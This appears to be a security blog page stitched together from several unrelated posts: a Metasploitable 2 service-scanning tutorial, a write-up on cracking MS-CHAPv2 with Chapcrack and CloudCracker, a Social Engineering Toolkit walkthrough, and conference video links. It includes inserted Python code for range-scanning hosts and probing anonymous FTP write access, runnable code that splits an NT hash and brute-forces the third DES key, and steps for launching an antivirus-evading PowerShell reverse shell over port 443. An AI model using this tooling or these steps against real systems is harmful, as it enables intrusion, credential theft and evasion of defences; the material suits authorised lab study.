Metasploitable 2.0 Tutorial Part 2: Scanning for Network Services with Metasploit

In our last Metasploitable tutorial we looked at scanning the system with Nmap, looking for open ports and services. This time we will take a look at some of the built-in auxiliary scanner modules that come with Metasploit. These scanners let us search for and recover service information from a single computer or an entire network.

So let’s get started! (As usual, these techniques are for security professionals. Do not attempt to access systems that you do not own or do not have permission to test, and do not use production systems to learn these techniques.)

For this tutorial we will again be using our Backtrack 5 system as the testing platform and the purposefully vulnerable Metasploitable 2 virtual machine as our target system.

Running our Nmap scan produced a large number of open ports for us to pick and choose from. What many people don’t know is that Metasploit comes with a substantial number of built-in scanner modules (they live under auxiliary/scanner/).

Run “msfconsole” from a Backtrack command prompt, then type “search scanner” at the msf prompt:

msf > search scanner

Read down through the long list to see what is available. For this tutorial let’s focus on the ports that we found open, starting with SSH. Let’s search for only the ssh scanners:

Notice that several are available. We are only after version information for now, so we will use the SSH version scanner (auxiliary/scanner/ssh/ssh_version). Simply “use” the module, then “show options” to see which options it takes. In this case all we set was RHOSTS, the remote host (or range of hosts) to scan, which is our target.

Then type “run” (or its alias “exploit”) to start the scan:

We see that our target is indeed running an SSH server, and the banner tells us which version of the software is running.

Some of the scanners are more helpful than others. For example, if we use the MySQL version scanner (auxiliary/scanner/mysql/mysql_version) we get this:

The full version string of the MySQL server that is running. Others aren’t quite as helpful; let’s look at the Telnet version scanner:

Hmm… this just looks like a banner grab, with no hint as to which telnet software or version is running. But it is proof that something is listening there, and whatever the banner does say (a login prompt, a hostname) is still worth noting.

What is interesting too is that these scanner modules have different options that we can set. For instance, let’s run the SMB version scanner (auxiliary/scanner/smb/smb_version):

We give it the target address, it scans the host and returns the version of Samba that is running. But what if we wanted to scan the whole network for just the systems running Samba? This is where the beauty of the RHOSTS option comes into play. Instead of scanning a single host, let’s scan all 256 addresses in the /24 network.

We use the exact same module, but set RHOSTS to the network range (CIDR notation or a dash range such as first-last both work) like so:

Notice now it scanned all 256 hosts on the network and found Samba running on our Metasploitable 2 machine at!

This makes things much easier if you are just looking for certain services on a network. I set the THREADS option too. It defaults to 1, meaning hosts are scanned one at a time. If you are scanning a local LAN you can bump this up to 255 to make it go faster, or up to 50 if testing a remote network. Keep in mind that each thread is a concurrent connection, so a high thread count is noisier and much easier to spot in firewall logs or on an IDS.

Let’s use another scanner; this time let’s look for FTP servers. We won’t scan for version information, though we could with ftp_version. Instead, let’s try the FTP anonymous scanner (auxiliary/scanner/ftp/anonymous). This one scours a network and looks for FTP services that allow an anonymous user Read, Write or both kinds of access.

Just search for “ftp”, use the anonymous scanner, set RHOSTS and run it:

As you can see, this FTP server allows read access to anonymous users. From an attacker’s point of view it would have been better if it also allowed write access (a writable anonymous FTP directory is a drop point for malware and often a foothold), but this shows how easily we can check for specific misconfigurations with the included scanners. Read-only anonymous access still deserves a look at what is actually exposed.
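To make concrete what the ssh_version, mysql_version and ftp/anonymous modules above actually do on the wire, here is a plain-socket re-creation of the three probes plus an RHOSTS/THREADS-style range walk. This is an added example and not Metasploit code. The LAB table is a constructed, offline stand-in for a network with one Metasploitable 2-like host; the host address, banners and FakeSocket are assumptions for the demo. Leave connect at its default (socket.create_connection) to run the same probes against a lab range you are authorised to scan.

```python
"""Plain-socket re-creation of three Metasploit auxiliary scanners (added example)."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_ssh_banner(data: bytes) -> str:
    """RFC 4253 identification string: 'SSH-protoversion-softwareversion [comments]'."""
    line = data.split(b"\n", 1)[0].strip()
    if not line.startswith(b"SSH-"):
        raise ValueError("not an SSH banner")
    return line.decode("ascii", "replace")


def parse_mysql_greeting(data: bytes) -> str:
    """Initial handshake: 4-byte packet header, protocol byte 0x0a, NUL-terminated version."""
    if len(data) < 6 or data[4] != 0x0A:
        raise ValueError("not a MySQL protocol-10 handshake")
    return data[5:data.index(b"\x00", 5)].decode("ascii", "replace")


def ssh_version(sock) -> str:
    return parse_ssh_banner(sock.recv(256))


def mysql_version(sock) -> str:
    return parse_mysql_greeting(sock.recv(256))


def ftp_anonymous(sock):
    """Log in as anonymous; report READ, READ/WRITE (a directory could be created) or None."""
    def cmd(line: bytes) -> bytes:
        sock.sendall(line + b"\r\n")
        return sock.recv(512)

    if not sock.recv(512).startswith(b"220"):
        return None
    reply = cmd(b"USER anonymous")
    if reply.startswith(b"331"):
        reply = cmd(b"PASS anonymous@example.com")
    if not reply.startswith(b"230"):
        return None
    if cmd(b"MKD anon_write_probe").startswith(b"257"):
        cmd(b"RMD anon_write_probe")  # clean up after ourselves
        return "READ/WRITE"
    return "READ"


def scan(rhosts: str, port: int, probe, threads: int = 1,
         connect=socket.create_connection, timeout: float = 5.0) -> dict:
    """RHOSTS-style scan: rhosts is a single address or a CIDR block; threads = THREADS."""
    net = ipaddress.ip_network(rhosts, strict=False)
    targets = [str(h) for h in net.hosts()] if net.num_addresses > 1 else [str(net.network_address)]

    def one(host):
        try:
            with connect((host, port), timeout) as s:
                return host, probe(s)
        except (OSError, ValueError):  # refused, timed out, or not the expected protocol
            return host, None

    with ThreadPoolExecutor(max_workers=threads) as pool:
        return {host: info for host, info in pool.map(one, targets) if info is not None}


# Constructed offline lab: one host answering like Metasploitable 2, everything else refuses.
LAB = {
    "192.168.1.20": {
        22: [b"SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n"],
        3306: [b"\x4a\x00\x00\x00\x0a5.0.51a-3ubuntu5\x00" + b"\x00" * 40],
        21: [b"220 (vsFTPd 2.3.4)\r\n", b"331 Please specify the password.\r\n",
             b"230 Login successful.\r\n", b"550 Create directory operation failed.\r\n"],
    }
}


class FakeSocket:
    """Scripted replies so the probes run without a network (test double, not real I/O)."""
    def __init__(self, replies):
        self.replies = list(replies)

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False

    def sendall(self, data):
        pass

    def recv(self, n):
        return self.replies.pop(0) if self.replies else b""


def lab_connect(address, timeout=None):
    host, port = address
    try:
        return FakeSocket(LAB[host][port])
    except KeyError:
        raise ConnectionRefusedError(f"{host}:{port}")


if __name__ == "__main__":
    for port, probe in ((22, ssh_version), (3306, mysql_version), (21, ftp_anonymous)):
        print(port, scan("192.168.1.0/24", port, probe, threads=50, connect=lab_connect))
```

The write check mirrors the idea behind the Metasploit module: after a successful anonymous login it tries to create (and then remove) a directory, so a 257 reply means the server is writable. Hosts that refuse, time out or speak a different protocol are simply dropped from the result, which is what makes a whole-range scan readable.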

Well, that’s it for this tutorial. Next time we will look at using information obtained from a scan to find and use a root level exploit on the Linux Metasploitable box!

(Want to learn a LOT more about penetration testing with Metasploit on the Backtrack platform? Check out the Bible of pentesting with Metasploit, “Metasploit: The Penetration Tester’s Guide“.)

Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic

For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview:

1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted.

2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connections to their WPA2 Enterprise RADIUS servers should immediately start migrating to something else.

That is all, have a nice day…

Wait a minute, “PPTP traffic should be considered unencrypted,” what???

A recently released article by Moxie explains in detail how they are able to crack the MS-CHAPv2 exchange, used in many PPTP-based VPNs, with a 100% success rate. But that is not all: the protocol is also used in WPA2 Enterprise environments to authenticate users against RADIUS servers.


When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the Internet. Well, it looks like this is no longer the case (if it ever was: PPTP’s MPPE session keys are derived from the same password hash, so whoever recovers the hash can also decrypt the tunnel).

From Moxie’s article, the weakness lies in how the user’s password hash is turned into the three DES keys used in the response computation:

“The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2^128), we can incrementally brute force 7 bytes of it at a time.

The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros:”

Padding the last key with zeros leaves only two unknown bytes in it, so that key falls to a 2^16 search in an instant. Moxie created a tool called Chapcrack that pulls the necessary challenge and response material from a network packet capture and cracks the third DES key on the spot. But this still leaves the first two DES keys, which are full 56-bit keys and could take a long time to crack.

Unless, that is, you take the output from Chapcrack and upload it to CloudCracker.

CloudCracker is an online password cracking service that connects to a mean FPGA-based box built by Pico Computing, which they claim can crack any DES key within 24 hours:

“They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.”

So basically, if you can get a packet capture of the MS-CHAPv2 handshake, you can use Chapcrack to extract the challenge and response (it recovers the third DES key itself) and produce a token for CloudCracker, which returns the remaining key material within 24 hours. What comes back is the user’s NT password hash, and since MS-CHAPv2 only ever needs the hash (never the password itself), that is enough to decrypt the captured PPTP traffic or to log in to the user’s VPN or RADIUS server.
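The following is an added example (not chapcrack, and not Moxie’s code) that carries the quoted divide-and-conquer argument through in code: the NT hash is split into three 7-byte keys exactly as the quote describes, the zero-padded third key is recovered by a 2^16 search, and a single candidate check shows why the first two keys cost one 2^56 sweep rather than two. md4() and challenge_hash() follow RFC 1320 and RFC 2759; des_stand_in() is NOT DES (the standard library has none), it is an HMAC-based 8-byte keyed function that stands in for DES_encrypt so the key-splitting and search logic can run offline, and a real DES implementation can be dropped in for actual captures. The password, username and challenges are constructed for the demo.

```python
"""MS-CHAPv2 NT-Response key split and divide-and-conquer recovery of K3 (added example)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is md4(password.encode('utf-16le'))."""
    def rol(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, message-word order, shift amounts)
        (f, 0, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [4 * (i % 4) + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a, b, c, d = d, rol(a + fn(b, c, d) + x[j] + k, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash: first 8 bytes of SHA1(PeerChallenge || AuthChallenge || UserName)."""
    return hashlib.sha1(peer_challenge + auth_challenge + username.encode()).digest()[:8]


def split_keys(nt: bytes):
    """The 16-byte hash becomes three 7-byte DES keys; K3 is 2 real bytes plus 5 zero bytes."""
    padded = nt + b"\x00" * 5  # Microsoft's zero padding out to 21 bytes
    return padded[0:7], padded[7:14], padded[14:21]


def des_stand_in(key7: bytes, block: bytes) -> bytes:
    """Stand-in for DES_encrypt(key7, block): 8 bytes out, keyed by 7 bytes. NOT DES."""
    return hmac.new(key7, block, hashlib.sha256).digest()[:8]


def nt_response(nt: bytes, chal: bytes, cipher=des_stand_in) -> bytes:
    """24-byte NT-Response = E_K1(chal) || E_K2(chal) || E_K3(chal)."""
    return b"".join(cipher(k, chal) for k in split_keys(nt))


def crack_k3(chal: bytes, response: bytes, cipher=des_stand_in):
    """Only 2^16 candidates exist for the last key, so this is instant."""
    target = response[16:24]
    for i in range(1 << 16):
        key = i.to_bytes(2, "big") + b"\x00" * 5
        if cipher(key, chal) == target:
            return key[:2]
    return None


def matches_k1_or_k2(candidate7: bytes, chal: bytes, response: bytes, cipher=des_stand_in):
    """One encryption per candidate tests it against BOTH K1 and K2, because both keys
    encrypt the same ChallengeHash; the remaining work is one 2^56 sweep, not two."""
    ct = cipher(candidate7, chal)
    return (ct == response[0:8], ct == response[8:16])


def work_factor() -> dict:
    return {"md4_output_direct": 2 ** 128, "divide_and_conquer": 2 ** 56 + 2 ** 16}


if __name__ == "__main__":
    nt = nt_hash("password")  # constructed weak password
    chal = challenge_hash(b"P" * 16, b"A" * 16, "alice")  # constructed challenges and user
    resp = nt_response(nt, chal)
    print("K3 recovered:", crack_k3(chal, resp).hex(), "expected:", nt[14:16].hex())
    print("K1 candidate:", matches_k1_or_k2(nt[0:7], chal, resp), work_factor())
```

Two things the code makes visible that the prose only states: the third key is recovered with no help from any cloud service, and once K1 and K2 are known you hold the complete NT hash, which is the only secret MS-CHAPv2 ever uses, so the password itself never needs to be cracked.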


Looks like it is time to move on from MS-CHAPv2 based security products.

Social Engineering Toolkit: Bypassing Anti-Virus using Powershell

Just when it looked like Anti-Virus was getting the upper hand against the Social Engineering Toolkit…

At the Security BSides conference in Cleveland, David Kennedy, the author of SET, showed off some of the program’s new features. One is a very interesting way to get a remote shell while completely bypassing anti-virus, using a Windows PowerShell attack. Let’s take a quick look at how this works.

  • Fire up SET and pick option “1”, Social-Engineering Attacks
  • Select option “10”, Powershell Attack Vectors:

  • Next choose number “1”, “Powershell Alphanumeric Shellcode Injector”:

Okay, now enter the IP address of the Backtrack system and the port you want the Windows machine to connect back on. The default, 443, is usually good enough: outbound HTTPS is allowed through most firewalls, so the reverse connection blends in with normal web traffic. SET will now create the payload code for 32- and 64-bit Windows:

When it is done, it gives you the option to start a listener. This sets up SET to receive the incoming connection from the Windows system; for those familiar with Metasploit, this just starts the standard exploit/multi/handler for a reverse shell. Enter “yes” and pick whether you want a 32- or 64-bit listener (it has to match the version of the PowerShell code you run on the target).

SET starts up Metasploit, runs the payload handler and waits for an incoming connection:

All we need to do now is retrieve the PowerShell code that SET created. The code is saved in SET’s Report/Powershell directory.

When you navigate to the directory, you will see both the 32- and 64-bit versions of the PowerShell code. If a Windows system runs this code, a remote session will open up to the Backtrack machine. For this example, I will just copy the code:

and paste it into a Windows 7 command prompt:

Once you hit enter, a full remote shell session is created to the Backtrack SET machine:

Game over. The Windows 7 system in this instance was fully updated and had one of the best anti-virus/internet security programs available. The AV didn’t see a thing, and the reason is instructive: nothing is ever written to disk as an executable. PowerShell itself allocates memory, copies the shellcode into it and starts a thread on it, so a file-based scanner has no file to inspect.

PowerShell is available on almost every Windows box nowadays, making this a very powerful attack. It is an amazing tool for pentesters, but as usual there are those who will use it for evil purposes.

Most likely you would need to be tricked into running this for the attack to succeed, so as always be very careful opening files and links from e-mails and social media messages. Run a browser script-blocking add-on like NoScript to prevent code from automatically running on visited websites. On the defensive side, logging process creation together with command lines, so that a hidden-window encoded PowerShell launch stands out, is worth more than hoping the AV will recognise the payload.

Also be very wary of shortened links, especially on Twitter. Recently I saw a shortened link on Twitter that, when expanded, was a four-line command pointing at a malware server.

BSides Cleveland Security Conference Videos

If you don’t have the chance to get to the big security conferences, you always look forward to the conference videos when they come out. July is no exception, with several awesome conferences taking place. Adrian Crenshaw (aka Irongeek) has released links to all of the BSides Cleveland security conference videos.

Below are two of my favorites.

First up is Dave Kennedy, mad hugger and security guru extraordinaire, with a great look at some of his pentesting secrets and techniques. This is an excellent look at his Social Engineering Toolkit, with tips on bypassing anti-virus, elevating a user to an Admin account, and egress techniques.

Next up is “Pass the Hash like a Rockstar” by Martin “Purehate” Bos, a great look at the different techniques used to compromise systems with pass-the-hash. Somewhat disappointingly, this is not the talk he planned to give: he was going to speak on password cracking, which sounded really interesting, but had to change it at the last moment. Hopefully he will release the intended talk at some point, but this one is very good too!